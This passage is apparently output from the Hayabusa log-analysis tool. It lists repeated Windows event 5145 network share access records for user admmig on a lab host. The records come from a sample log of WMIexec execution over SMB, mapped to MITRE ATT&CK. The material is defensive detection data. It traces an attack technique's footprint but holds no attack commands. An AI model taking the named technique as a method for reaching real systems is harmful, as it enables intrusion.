0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.079 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:32.079 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.096 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.114 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.114 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
